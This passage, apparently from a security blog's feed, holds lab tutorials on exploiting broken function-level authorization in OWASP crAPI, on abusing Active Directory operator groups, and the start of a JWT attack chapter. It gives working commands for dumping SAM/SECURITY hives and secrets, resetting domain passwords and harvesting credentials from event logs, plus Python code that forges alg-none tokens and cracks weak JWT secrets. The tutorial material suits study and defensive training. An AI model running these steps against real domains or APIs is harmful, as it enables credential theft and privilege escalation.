Broken Function Level Authorization (BFLA) is a vulnerability where users gain unauthorized access to functions within an API. It&apos;s like someone having a key to rooms they&apos;re not supposed to enter. In an API context, this means users can perform actions or access functionalities that should be restricted, often due to insufficient validation of user permissions at the function level.

## How BFLA Manifests in APIs

BFLA often shows up in scenarios where API endpoints handle sensitive operations - like changing user roles, accessing administrative features, or modifying critical data. These endpoints, if not properly secured, become weak links, allowing users to execute functions beyond their permission scope. It&apos;s a subtle flaw, as it doesn&apos;t block access entirely but allows unauthorized actions within allowed sessions.
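
Stripped to its essence, the missing control is an authorization gate per function rather than per object. A minimal hypothetical sketch:

```python
# Hypothetical role model: which HTTP methods each role may use
ROLE_PERMISSIONS = {
    "user": {"GET", "POST"},
    "admin": {"GET", "POST", "PUT", "DELETE"},
}

def dispatch_vulnerable(role, method):
    # BFLA: routes by method only; any authenticated caller may DELETE
    return f"executed {method}"

def dispatch_fixed(role, method):
    if method not in ROLE_PERMISSIONS.get(role, set()):
        return "403 Forbidden"
    return f"executed {method}"

print(dispatch_vulnerable("user", "DELETE"))  # executed DELETE
print(dispatch_fixed("user", "DELETE"))       # 403 Forbidden
```

The vulnerable dispatcher authenticates the session but never asks whether this role may call this function, which is the gap BFLA exploits.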

## The Consequences of Ignoring BFLA

The impact of overlooking BFLA can be profound. It ranges from data breaches, where sensitive information is altered or stolen, to complete system compromises. In the worst cases, BFLA can enable attackers to escalate their privileges within the system, potentially gaining administrative control. This highlights why ensuring function-level security is as crucial as securing the data objects themselves.

## Identifying BFLA in Practice

We begin our BFLA journey where we left off - navigating the user profile. Among various options, the video upload feature catches our eye as a potential vulnerability hotspot.

![](/content/images/2024/01/image-48.png)

Profile of the user

Upon uploading a video, a unique ID is generated, a seemingly mundane but crucial detail in our investigation.

![](/content/images/2024/01/image-34.png)

Request uploading video

Our curiosity leads us to experiment with video modifications. Changing the video&apos;s name, we notice the request includes a &quot;videoName&quot; parameter, revealing the video&apos;s details and the endpoint&apos;s ID.

![](/content/images/2024/01/image-35.png)

Rename the video

![](/content/images/2024/01/image-36.png)

Request to change the name

Next, we switch gears and upload a video as a different user, using Firefox Containers for seamless session management, observing the new video&apos;s ID.

![](/content/images/2024/01/image-37.png)

Request to upload a video of the other user

Returning to our original user, we play with the newfound ID, first attempting a straightforward ID swap in the request endpoint, which, as seen in the image, doesn&apos;t yield the desired result.

![](/content/images/2024/01/image-38.png)

Change of ID in the request

Exploring further, we recall techniques from previous chapters, like tweaking the JWT. However, this path also hits a dead end, with the token flagged as invalid.

![](/content/images/2024/01/image-39.png)

User change at JWT

We then test adding the ID directly to the request body, a method to be explored in future chapters, which unfortunately doesn&apos;t work here.

![](/content/images/2024/01/image-40.png)

We add parameter to the request

Our journey takes an interesting turn when we experiment with different request methods. Switching to DELETE, we unearth a clue - a response indicating that this action is reserved for administrators.

![](/content/images/2024/01/image-42.png)

Change request method

Despite various attempts, including changing the API version, our breakthrough comes when we replace &apos;user&apos; with &apos;admin&apos; in the request. This subtle yet powerful change allows us to delete another user&apos;s video, successfully exposing the BFLA vulnerability.

![](/content/images/2024/01/image-43.png)

We change the endpoint version

![](/content/images/2024/01/image-44.png)

We change from &quot;user&quot; to &quot;admin&quot;

![](/content/images/2024/01/image-45.png)

Unable to access the video because it is deleted

# **Conclusion**

As we wrap up our exploration of BOLA and BFLA in API security, I can&apos;t help but reflect on how these vulnerabilities highlight the intricate challenges we face in safeguarding our digital world. It&apos;s a journey that requires not just technical expertise, but also a keen sense of vigilance and responsibility.

**Key Takeaways:**

-   **BOLA&apos;s Challenge**: The necessity for robust permission checks to prevent unauthorized data access.
-   **The Intricacies of BFLA**: The importance of securing each function within an API to prevent unauthorized actions.
-   **Practical Insights**: Our hands-on experience with OWASP&apos;s crAPI illuminated these vulnerabilities in a real-world context.

Looking forward, I&apos;m excited to guide you through our next topics: Mass Assignment and the potential vulnerabilities in resetting another user&apos;s password. These areas are crucial in our continuous endeavor to understand and strengthen API security.</content:encoded><author>Ruben Santos</author></item><item><title>Three Keys to the Kingdom: Uncovering the Roles of Account Operators, Backup Operators, and Event Log Readers in Offensive Security</title><link>https://www.kayssel.com/post/interesting-groups-ad</link><guid isPermaLink="true">https://www.kayssel.com/post/interesting-groups-ad</guid><description>Discover the roles of Account Operators, Backup Operators, and Event Log Readers in Active Directory security. Learn about their privileges, vulnerabilities, and ethical ways to manage and mitigate risks in our comprehensive series.</description><pubDate>Sun, 21 Jan 2024 18:15:10 GMT</pubDate><content:encoded># Introduction: Continuing Our Journey Through Active Directory Security

Welcome back to our insightful series on Active Directory (AD) security. In this chapter, we shift our focus to explore the roles of Account Operators, Backup Operators, and Event Log Readers. While this chapter stands on its own, it complements our previous discussions, such as the one on SeImpersonatePrivilege, under the broad theme of privilege escalation in AD environments.

As we delve into these new roles, we&apos;ll uncover their unique implications in network security, building on the general principles of AD security that we&apos;ve been exploring throughout this series.

#### Highlights of This Chapter:

-   **Role-Specific Insights**: Gain an in-depth understanding of Account Operators, Backup Operators, and Event Log Readers.
-   **Practical Applications**: Explore real-world scenarios and lab demonstrations highlighting these roles.
-   **Ethical Security Practices**: Continue our emphasis on responsible and ethical approaches to managing AD security challenges.

Join us as we further navigate the complex and ever-evolving landscape of Active Directory security, enhancing your skillset and understanding with each chapter.

# Understanding the Key Players in Active Directory Security: Account Operators, Backup Operators, and Event Log Readers

In the intricate world of Active Directory (AD) security, certain user groups play pivotal roles that are often overlooked. Among these, Account Operators, Backup Operators, and Event Log Readers stand out for their unique access and privileges. Let&apos;s explore their functionalities and the security implications they carry.

## Account Operators: The Frontline of User Management

-   **Role Overview**: Account Operators are pivotal in managing user accounts and groups within a domain. They have the power to create, modify, and delete accounts, except for those in highly privileged groups.
-   **Security Perspective**: While they don&apos;t have domain-wide carte blanche, their ability to impact user accounts makes them a potential target for exploitation. An attacker gaining access to an Account Operator account could manipulate user credentials, escalating their reach within the network.

## Backup Operators: The Silent Guardians with Potent Powers

-   **Functionality**: As their name suggests, Backup Operators are entrusted with backing up and restoring files, regardless of security permissions. They have unrestricted access to all files for these purposes.
-   **The Flip Side**: This “pass” through security permissions is a double-edged sword. An attacker with Backup Operator privileges could potentially access sensitive data or systems, making this group a less conspicuous yet critical target for privilege escalation.

## Event Log Readers: The Overlooked Watchers

-   **Their Domain**: Event Log Readers have the ability to view event logs on local and remote machines within the network. These logs contain critical information about system operations, security incidents, and other key events.
-   **Potential Risks**: While seemingly benign, the information in event logs can be a treasure trove for attackers. By gaining access to these logs, an attacker can gather intelligence about the network&apos;s security posture, identify potential vulnerabilities, and plan further attacks. The oversight of this group&apos;s capabilities can often lead to undervalued security risks.

# Methods of Privilege Escalation: Navigating the Vulnerabilities

In this section, we delve into the specific methods by which each of the three focused groups in Active Directory – Account Operators, Backup Operators, and Event Log Readers – can be exploited for privilege escalation. We&apos;ll explore the technical vulnerabilities and provide hypothetical scenarios to illustrate these risks.

## Preparing Your Lab Environment for Privilege Escalation Testing

As we venture into the fascinating world of privilege escalation in Active Directory, it&apos;s essential to have a playground where we can safely experiment and learn. Here&apos;s your step-by-step guide to setting up your own cybersecurity lab environment, ensuring a risk-free space for your explorations.

#### Step 1: Adding Users to Key Groups

In your lab&apos;s domain controller, with administrator privileges, you can add a user to our groups of interest - Account Operators, Event Log Readers, and Backup Operators. Fire up your PowerShell and enter the following commands:

```powershell
Add-ADGroupMember -Identity &quot;Account Operators&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Event Log Readers&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Backup Operators&quot; -Members &quot;YourUsername&quot;
```

_Replace &quot;YourUsername&quot; with the actual username you&apos;re adding._

#### Step 2: Preparing Other Machines in Your Domain

If you&apos;re not on the domain controller, no worries! You can still set things up from another machine in your domain. Make sure you have admin rights, and then run these commands to get the necessary tools:

```powershell
# Install the RSAT AD tools first, then load the module (requires admin rights)
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory

Add-ADGroupMember -Identity &quot;Account Operators&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Event Log Readers&quot; -Members &quot;YourUsername&quot;
Add-ADGroupMember -Identity &quot;Backup Operators&quot; -Members &quot;YourUsername&quot;
```

#### Step 3: Tidying Up After Testing

After you&apos;ve completed your tests and learned some cool stuff, it&apos;s important to keep your lab tidy. Here’s how you can remove users from the groups easily:

```powershell
Remove-ADGroupMember -Identity &quot;Account Operators&quot; -Members &quot;YourUsername&quot; -Confirm:$false

```

## Simulating a Real-World Scenario: Accessing a Machine via RDP

Now that our lab is set up, let&apos;s add a dash of realism to our cybersecurity adventure. Imagine a scenario where a malicious user, through some cunning or luck, manages to get their hands on user credentials. Their goal? To access one of your machines via Remote Desktop Protocol (RDP). How would they proceed?

For our simulation, we&apos;ll use a Linux environment to initiate an RDP session. Here&apos;s the command you&apos;ll need, but remember, this is just for our controlled lab scenario:

```bash
xfreerdp /u:beruinsect &apos;/p:Password1&apos; /d:shadow.local /v:192.168.20.152 /dynamic-resolution +clipboard
```

In this command:

-   `/u:beruinsect` specifies the username.
-   `/p:Password1` is where you&apos;d put the password (change &apos;Password1&apos; to the actual password).
-   `/d:shadow.local` is the domain.
-   `/v:192.168.20.152` is the IP address of the machine you&apos;re accessing.
-   `/dynamic-resolution` and `+clipboard` are additional options for a better remote experience.

## Simulating Account Operators&apos; Privileges in Your Cybersecurity Lab

Following our RDP access simulation, let&apos;s delve deeper into what a malicious user could achieve after gaining access as an Account Operator. This scenario will build on our previous lab setup and explore the potential actions and their implications.

#### Step 1: Identifying Members of &quot;Account Operators&quot;

Initially, we&apos;d need to identify who&apos;s in the &quot;Account Operators&quot; group. Let&apos;s use a PowerShell script for this purpose:

```powershell
# Define the group name to search for in Active Directory
$groupName = &quot;Account Operators&quot;

# Create an ADSI searcher object. This is a tool for querying Active Directory.
$searcher = [adsisearcher]&quot;(&amp;(objectCategory=group)(cn=$groupName))&quot;

# Execute the search and store the result. This will find the specific group.
$group = $searcher.FindOne()

# Check if the group was found. If the group exists, the script will proceed.
if ($group -ne $null) {
    # Extract the member property from the group, which contains the list of members.
    # The members are listed in the Distinguished Name (DN) format.
    $group.Properties.member
}
# If the group is not found, this part of the script will be skipped,
# preventing errors from attempting to access properties of a null object.
```

![](/content/images/2024/01/image-8.png)

Group identification

#### Step 2: Verifying a User&apos;s Membership

To check if our compromised user &apos;beruinsect&apos; is in this group, we run:

```powershell
net users beruinsect /domain

```

![](/content/images/2024/01/image-7.png)

Domain user details confirming group membership

#### Step 3: Exploiting Account Operator Privileges

With &apos;beruinsect&apos; confirmed as an Account Operator, here are some actions they could perform:

```powershell
net user testingACOP Password123 /add /domain

```

**Creating a New User**: Establishing a foothold in the domain

![](/content/images/2024/01/image-9.png)

User created

**Changing Existing User Passwords**: Gaining access to other accounts.

```powershell
net user ironhammer Password1 /domain

```

![](/content/images/2024/01/image-19.png)

Change user password

**Local Domain Controller Login**: A potential avenue for further exploration.

![](/content/images/2024/01/image-10.png)

Successful local access to the domain controller

If our user does not belong to this group, the following message would be displayed upon attempting to log in:

![](/content/images/2024/01/image-11.png)

Login attempt with a user who is not an account operator

## Exploring the Power of Backup Operators: A Path to Domain Admin

In our continuous exploration within the cybersecurity lab, we shift our focus to the intriguing &apos;Backup Operators&apos; group. Its distinct privileges can unlock a path to domain admin rights, which makes this group capable of causing substantial security breaches. To demonstrate this, we&apos;ll be using a specific tool: &apos;backup\_dc\_registry&apos;. This proof of concept (POC) on GitHub vividly illustrates how Backup Operator privileges can be abused to remotely extract vital system files such as SAM, SYSTEM, and SECURITY, highlighting the potential for significant security exploits through practical application.

[GitHub - horizon3ai/backup\_dc\_registry: A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY](https://github.com/horizon3ai/backup_dc_registry/tree/main)

#### Step 1: Setting Up an SMB Server

Firstly, we need to establish an SMB server on our attacker machine. This server will act as a repository for files we&apos;ll acquire from the domain controller. Using Impacket, a versatile tool for network protocols, we set up the server with the following command:

```bash
impacket-smbserver smbfolder $(pwd) -smb2support

```

![](/content/images/2024/01/image-14.png)

SMB server created with Impacket

#### Step 2: Executing the Attack

With our SMB server ready, we now use a script to exploit the Backup Operator privileges. This script will allow us to access and retrieve the Security Account Manager (SAM) file from the domain controller, a critical step towards compromising the domain admin:

```bash
python3 reg.py beruinsect:&apos;Password1&apos;@192.168.20.151 backup -p &apos;\\192.168.1.108\smbfolder&apos;

```

![](/content/images/2024/01/image-13.png)

Execute the attack

#### Step 3: Dumping Credentials

After acquiring the necessary files, the next step involves extracting the credentials. This process is similar to what we covered in [Chapter 2](https://www.kayssel.com/post/active-directory-2-computers/):

```bash
impacket-secretsdump -system SYSTEM -security SECURITY -sam SAM local

```

![](/content/images/2024/01/image-15.png)

Dump credentials

## The Subtle Power of Event Log Readers: Uncovering Hidden Secrets

As we wrap up our journey through the different roles in Active Directory, we turn our attention to the often-underestimated group of Event Log Readers. This group, while not directly associated with overt privilege escalation methods, holds a different kind of power – the ability to uncover hidden information within system events that can lead to significant insights, including potential credentials.

#### Understanding Event Log Readers

Event Log Readers have the capability to access and read the system event logs. While this may seem innocuous at first glance, in large domains, these logs can be a goldmine of information, including inadvertent credential exposure. This is especially true when examining the trails left by PowerShell scripts, which might require higher privileges and inadvertently expose sensitive data in the process.

#### The Art of Event Log Analysis

Let&apos;s see how one can harness the power of this group to uncover potentially valuable information. Suppose you want to monitor events related to a specific user, &apos;beruinsect&apos;. The following PowerShell command can be used to filter and capture relevant log entries:

```powershell
wevtutil qe Security /rd:true /f:text | Select-String &quot;beruinsect&quot; &gt; logsberu

```

This command queries the Security logs, formats the output in text, and then filters for entries containing &apos;beruinsect&apos;, redirecting the output to a file for further analysis.
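
Once the filtered output is saved, sifting it for credential-like strings can be scripted. The following sketch is a hypothetical helper – the patterns and sample lines are illustrative, not taken from a real log:

```python
import re

# Patterns that often betray credentials in logged command lines
# (Security event 4688) or PowerShell script-block logging (4104)
PATTERNS = [
    re.compile(r"(?i)-p(assword)?[ :=]+\S+"),
    re.compile(r"(?i)net user \S+ \S+"),
    re.compile(r"(?i)convertto-securestring"),
]

def scan(lines):
    # Keep every line matching at least one credential pattern
    return [line for line in lines if any(p.search(line) for p in PATTERNS)]

sample = [
    "Process Command Line: net user svc_backup Summer2024! /add",
    "Process Command Line: notepad.exe",
    "ScriptBlockText: $pw = ConvertTo-SecureString Summer2024! -AsPlainText",
]
for hit in scan(sample):
    print(hit)
```

Even a crude filter like this surfaces the lines worth reading manually in a large export.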

![](/content/images/2024/01/image-18.png)

Search for information on events

### The Importance of Log Scrutiny

This exercise with Event Log Readers emphasizes the less obvious, yet crucial, aspects of cybersecurity – vigilance in monitoring and analyzing logs. Even though Event Log Readers might not directly escalate privileges, the insights gleaned from logs can often lead to breakthroughs in understanding security vulnerabilities or uncovering inadvertent exposures.

# Conclusion: Harnessing Knowledge for Enhanced Security

As we conclude our in-depth exploration of the Active Directory roles of Account Operators, Backup Operators, and Event Log Readers, it&apos;s clear that each group, with its unique privileges and access, plays a critical role in the landscape of network security. From the active management capabilities of Account Operators to the crucial data access of Backup Operators, and the insightful oversight of Event Log Readers, these roles collectively form a tapestry of potential vulnerabilities and power within an AD environment.

#### Key Takeaways:

1.  **Understanding Leads to Strength**: By comprehensively understanding the functionalities and potential vulnerabilities of these roles, IT professionals and security enthusiasts can better fortify their defenses against potential exploits.
2.  **Power with Responsibility**: The exploration of these roles underscores the importance of responsible management. These privileges, while essential for network operation and maintenance, must be wielded with caution and oversight.
3.  **Vigilance is Crucial**: The subtleties of roles like Event Log Readers highlight that sometimes, the most powerful insights come from careful observation and analysis of seemingly mundane data.

#### Moving Forward:

As we navigate the complex world of cybersecurity, let this exploration serve as a reminder of the constant need for vigilance, ethical practice, and continuous learning. Whether it&apos;s through setting up controlled lab environments, practicing safe and legal testing methods, or keeping abreast of the latest in cybersecurity trends and threats, the journey towards robust network security is ongoing and ever-evolving.</content:encoded><author>Ruben Santos</author></item><item><title>Decoding JWT: Unveiling Vulnerabilities in API Security</title><link>https://www.kayssel.com/post/api-hacking-3</link><guid isPermaLink="true">https://www.kayssel.com/post/api-hacking-3</guid><description>Dive into JWTs in API hacking: Explore a key vulnerability, learn tools like jwt_tool and Burp Suite, and understand the &apos;what-ifs&apos; in security, like altering roles. For more, visit Burp Suite&apos;s site. Stay curious in cybersecurity!</description><pubDate>Sun, 14 Jan 2024 16:45:34 GMT</pubDate><content:encoded># **Introduction: Mastering JWTs in API Hacking**

Welcome back to our enthralling series where the art of API hacking takes center stage! Having journeyed through various methodologies in the previous chapter, we&apos;re now set to dive deeper into a specific, yet critical aspect of API security – the world of JSON Web Tokens (JWTs).

In the realm of API hacking, understanding JWTs is not just beneficial; it&apos;s essential. These tokens are the keystones of authentication and authorization in numerous web applications. This chapter will shed light on the inner workings of JWTs, unraveling how they function, why they&apos;re so pivotal in APIs, and most importantly, how they can become potential targets for hackers.

Our exploration won&apos;t stop at theory. We&apos;ll venture into the practical world, donning our hacker&apos;s hats to uncover and exploit JWT vulnerabilities. Armed with tools like jwt\_tool and Burp Suite, we&apos;ll demonstrate real-life hacking scenarios. You&apos;ll learn to identify weaknesses, test for vulnerabilities, and understand the attacker&apos;s perspective, which is crucial in fortifying your own APIs.

Get ready to immerse yourself in the intriguing world of JWTs within API hacking. Whether you&apos;re honing your hacking skills, seeking to fortify your APIs, or simply fascinated by the world of cybersecurity, this chapter promises to be a treasure trove of knowledge and hands-on learning.

# **Unlocking the Secrets of Authentication: A Journey into JWTs**

First up on our agenda is a deep dive into the login portal of our application. We&apos;re embarking on a journey to unravel how users are authenticated and then authorized to access various URLs. It&apos;s like being a digital detective, piecing together the intricate puzzle of online security.

Do you recall the user we created in the registration form from the previous chapter? It&apos;s time to don our detective hats and intercept their login request. This is where the digital magic unfolds – we&apos;re about to witness a token spring into action. Picture it as a backstage pass; the moment the user logs in, a token is issued, swinging open the doors to various parts of the application.

![](/content/images/2023/12/image-127.png)

Token returned by the application

Now, our focus shifts to the token we&apos;ve just uncovered. Consider it the master key, deftly managing access across the application&apos;s landscape. As we delve deeper, observing the requests within the application, we&apos;ll discover a consistent pattern: this token proudly parades in the headers of every request. It’s not just a key; it’s a VIP badge, dictating the realms accessible to our user.

![](/content/images/2024/01/image-5.png)

JWT in request headers

And this brings us to the epicenter of our digital quest – these tokens are known as JWTs, short for JSON Web Tokens. They are the unsung heroes in the world of web applications, playing a pivotal role in managing authentication and authorization, particularly in APIs. Think of them as the Swiss Army knife for digital access. In today&apos;s chapter, we&apos;re setting off to explore the enigmatic yet fascinating world of JWTs. We&apos;ll delve into their mechanics and understand their vital role in our application&apos;s ecosystem. Brace yourself for an intriguing exploration into the world of JWTs.

# **Introduction to JSON Web Tokens (JWTs)**

Imagine you&apos;re at a carnival, and upon entering, you buy a ticket that grants you access to all the rides. This ticket is much like a JWT.

![](/content/images/2024/01/image.png)

JWT structure

A JWT is a compact, self-contained string used for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.

Think of it as a secure package that contains important information (known as claims). These claims might include user identity, authorization data, or any other data you want to safely transfer.

When a user logs in to an application, the server creates a JWT with user-specific data and sends it back to the user. The user&apos;s device stores this JWT and includes it in the header of future requests to the server. This is like showing your ticket every time you want to get on a ride at the carnival.

![](/content/images/2023/12/image-116.png)

Payload of the JWT decoded with CyberChef

The server, upon receiving a request with a JWT, decodes and verifies it. If the token is valid, the server proceeds with the request, knowing it&apos;s authenticated and authorized.

In short, JWTs are like secure, digital tickets used in the online world to ensure that the data being exchanged is authentic and authorized. They&apos;re widely used for authentication and information exchange in web applications, making online interactions smoother and safer.
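
As a quick illustration of that three-part structure, the sketch below decodes the header and payload of a token by hand – the same thing jwt.io or CyberChef do. The sample claims are made up for the example:

```python
import base64
import json

def b64url_decode(segment):
    # JWT segments drop base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data):
    # Encode without padding, as the JWT format requires
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def decode_jwt(token):
    # A JWT is three dot-separated parts: header.payload.signature
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload

# Build an illustrative token (dummy signature) and decode it
sample = ".".join([
    b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()),
    b64url_encode(json.dumps({"sub": "user@example.com", "role": "user"}).encode()),
    "dummysignature",
])
header, payload = decode_jwt(sample)
print(header["alg"], payload["role"])
```

Notice that decoding requires no secret at all – only the signature check does. That is exactly why a JWT payload should never carry sensitive data.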

## **Understanding the Vulnerabilities of JSON Web Tokens (JWTs)**

However, like any system, JWTs come with their own set of vulnerabilities. Addressing these weaknesses is crucial to maintain the integrity and security of the applications relying on them. Let’s explore some of the main vulnerabilities associated with JWTs:

1.  **Insecure Secret Keys**: The strength of a JWT lies in its secret key, used for signing the token. If this key is weak or commonly known, attackers can easily decode and tamper with the token, compromising the security.
2.  **Algorithm Manipulation**: JWTs allow choosing the algorithm for signing. If an attacker changes the algorithm to a less secure one or &apos;none&apos;, it can lead to the system accepting a forged token.
3.  **Exposed Sensitive Information**: JWTs should not contain too much sensitive information, especially if not properly encrypted. Exposing such data can lead to privacy breaches and security risks.
4.  **Lack of Token Expiration**: Tokens without an expiration time can be risky, as they can be used indefinitely, potentially by unauthorized parties if they are intercepted.
5.  **Flawed Token Validation**: Proper validation of JWTs is essential. Without it, unauthorized users might gain access, much like someone slipping through a malfunctioning turnstile.
6.  **Signature Stripping**: In this attack, the signature part of the JWT is removed, leading to the acceptance of a potentially forged token if the system fails to verify its authenticity.
7.  **Header and Payload Manipulation**: Altering the information within a JWT can lead to unauthorized access or privilege escalation, similar to tampering with a ticket&apos;s details to gain unauthorized entry.

In essence, while JWTs are efficient and widely used for authentication and information exchange, understanding and mitigating their vulnerabilities is key to maintaining robust security in web applications. Just as safety measures in a carnival ensure a secure and enjoyable experience, addressing JWT vulnerabilities ensures a secure and trustworthy digital environment.
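
To make vulnerability 2 concrete, here is a minimal sketch of the classic alg-none forgery: building an unsigned token that a verifier which blindly trusts the header would accept. The claims are illustrative:

```python
import base64
import json

def b64url(data):
    # Base64url-encode without padding, as JWT segments require
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_none_token(claims):
    # Declare the "none" algorithm and leave the signature empty;
    # a verifier that honors the header skips the signature check
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    return header + "." + payload + "."

token = forge_none_token({"sub": "user@example.com", "role": "admin"})
print(token)
```

A hardened backend pins the expected algorithm server-side instead of reading it from the attacker-controlled header.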

## **Main Tools for Analyzing JWT Security**

In our exploration of JWT security, we will be utilizing a range of tools, each offering unique capabilities for analyzing and mitigating vulnerabilities in JWT implementations. These tools provide a comprehensive approach to ensuring robust JWT security.

1.  **jwt\_tool**: This command-line utility excels in testing JWTs, allowing for the manipulation of tokens and the simulation of various attack scenarios.
2.  **Burp Suite**: An integrated platform for web security testing, Burp Suite offers features like traffic interception, automated scanning, and extensive analysis capabilities, including those for JWTs.
3.  **jwt.io**: An essential addition to our toolkit, jwt.io serves both as an educational resource and a practical tool for decoding, verifying, and generating JWTs. Its user-friendly interface makes it an excellent tool for quickly understanding and analyzing the structure and validity of JWTs.
4.  **JWTCrack**: Focused on cracking JWTs with weak secret keys, this tool is a testament to the importance of robust key management.
5.  **JWTSpy**: A Python-based tool for analyzing JWTs, JWTSpy identifies common vulnerabilities and misconfigurations, providing insights into potential security gaps.
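
The weak-secret attack behind tools like JWTCrack (item 4 above) is simple enough to sketch by hand: re-sign the token with each candidate secret and compare signatures. The token and wordlist below are fabricated for the demo:

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(signing_input, secret):
    # HS256 signature: HMAC-SHA256 over "header.payload" with the secret
    return b64url(hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest())

def crack(token, wordlist):
    # Re-sign the token with each candidate and compare signatures
    signing_input, _, signature = token.rpartition(".")
    for candidate in wordlist:
        if hmac.compare_digest(sign_hs256(signing_input, candidate), signature):
            return candidate
    return None

# Build a victim token signed with a deliberately weak secret, then recover it
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"role": "user"}).encode())
signing_input = header + "." + payload
token = signing_input + "." + sign_hs256(signing_input, "secret123")

print(crack(token, ["password", "admin", "secret123"]))
```

Because the whole attack runs offline against a captured token, the only real defense is a long, random signing key.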

### **Focusing on jwt\_tool, Burp Suite, and jwt.io for Today&apos;s Analysis**

For today&apos;s detailed analysis, we will be focusing on `jwt_tool`, Burp Suite, and jwt.io. This selection is strategic, allowing us to cover a wide range of testing and analysis scenarios:

-   **jwt\_tool** offers specialized functionalities for JWT testing, such as token manipulation and vulnerability testing.
-   **Burp Suite** provides a broad array of features for intercepting and analyzing web traffic, making it invaluable for examining JWTs within HTTP requests.
-   **jwt.io** will be utilized for its simplicity and effectiveness in decoding and encoding JWTs, which is crucial for understanding the structure and integrity of the tokens we are analyzing.

![](/content/images/2024/01/image-4.png)

Combination of tools

Together, these tools form a comprehensive toolkit for our JWT security testing. We aim to use these tools to uncover any potential vulnerabilities and to ensure that the JWT implementations in our applications are secure, reliable, and resilient against various types of attacks.

# **The Adventure of Attacking JWTs**

Now that we&apos;ve armed ourselves with the essential knowledge to audit JWT tokens and familiarized ourselves with the most important tools, it&apos;s time to dive into the really exciting part – testing the security of the token! 😊

## Unraveling JWTs: The Art of Token Identification

The first step in our adventure is a bit like detective work: we need to do some reconnaissance to uncover what algorithm is used for the signature and what secrets the payload holds. For this task, jwt.io is our go-to tool – it&apos;s like having a magnifying glass that quickly reveals everything we need to know. Take a look at the image below to see jwt.io in action.

![](/content/images/2023/12/image-117.png)

jwt.io to decode the token

It&apos;s interesting to note that jwt\_tool can also be used for this purpose.

```bash
python3 jwt_tool.py eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyc2diZW5naUBnbWFpbC5jb20iLCJyb2xlIjoidXNlciIsImlhdCI6MTcwMzY5NTIwNywiZXhwIjoxNzA0MzAwMDA3fQ.AsLqfKslKe5_LRW7qan_C5WXO4vb11PAg4nVukyrLYH4cQKDDc5KrAx224VbddGiZMQI2DCEOYNmiQv55ryyie99jWHBVXXzDC-oUiNEegbswBIrAo1b5OM4t1C5ldbfyshdpkz4wqSQlIWi_CqH0F6r7BIe2DbwqI3EalY64pODNXWooEIjFVpwVwCUgY1fPPD8j_bcB39mXdBo8TBRi-jvVaQtzorXvRveL7FwskWcujLW4JudHzo4GofUoUJKaoPLv59dcjziPhOIRpXnnlArJxhH9AtXG5Ai75xBWPX5xffhYm4Ok6TK3o7wSPFVWXpZ0EP90In1qr8UAW3vzg

```

![](/content/images/2023/12/image-119.png)

When we examine the jwt.io output, we notice something intriguing: the JWT&apos;s signature is marked as invalid. This could be a critical clue, hinting that the token&apos;s signature may not be crafted or validated correctly. It opens up the possibility of modifying the JWT payload and still having it accepted by the application – a potential security loophole.
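
That hypothesis is easy to prepare offline before replaying anything: keep the header and the original signature, rewrite a claim in the payload, and reassemble the token. If the server still accepts the result, signature validation is broken. A sketch, reusing the sub and role claims seen in the token above:

```python
import base64
import json

def b64url_decode(segment):
    # Restore the padding that JWT segments strip
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def tamper(token, claim, new_value):
    # Rewrite one claim but keep the original header and signature;
    # a server with flawed validation will accept the result anyway
    header_b64, payload_b64, signature = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload[claim] = new_value
    return ".".join([header_b64, b64url_encode(json.dumps(payload).encode()), signature])

# Illustrative token mirroring the claims above, with a dummy signature
original = ".".join([
    b64url_encode(json.dumps({"alg": "RS256"}).encode()),
    b64url_encode(json.dumps({"sub": "rsgbengi@gmail.com", "role": "user"}).encode()),
    "originalsignature",
])
forged = tamper(original, "role", "admin")
print(forged)
```

The forged token is what we will feed back to the application in the tests that follow.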

## **Embarking on a JWT Vulnerability Scanning Expedition**

With our preliminary reconnaissance through jwt.io wrapped up and the basic JWT information in hand, it&apos;s time to gear up for the next phase of our adventure: a vulnerability scan using jwt\_tool. Think of this as setting out on a treasure hunt, where the treasure is hidden vulnerabilities waiting to be discovered.

```bash
python3 jwt_tool.py -t http://192.168.20.120:8888/identity/api/v2/user/dashboard -rh &quot;Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyc2diZW5naUBnbWFpbC5jb20iLCJyb2xlIjoidXNlciIsImlhdCI6MTcwMzY5NTIwNywiZXhwIjoxNzA0MzAwMDA3fQ.AsLqfKslKe5_LRW7qan_C5WXO4vb11PAg4nVukyrLYH4cQKDDc5KrAx224VbddGiZMQI2DCEOYNmiQv55ryyie99jWHBVXXzDC-oUiNEegbswBIrAo1b5OM4t1C5ldbfyshdpkz4wqSQlIWi_CqH0F6r7BIe2DbwqI3EalY64pODNXWooEIjFVpwVwCUgY1fPPD8j_bcB39mXdBo8TBRi-jvVaQtzorXvRveL7FwskWcujLW4JudHzo4GofUoUJKaoPLv59dcjziPhOIRpXnnlArJxhH9AtXG5Ai75xBWPX5xffhYm4Ok6TK3o7wSPFVWXpZ0EP90In1qr8UAW3vzg&quot; -M pb | tee jwt_scan.txt

```

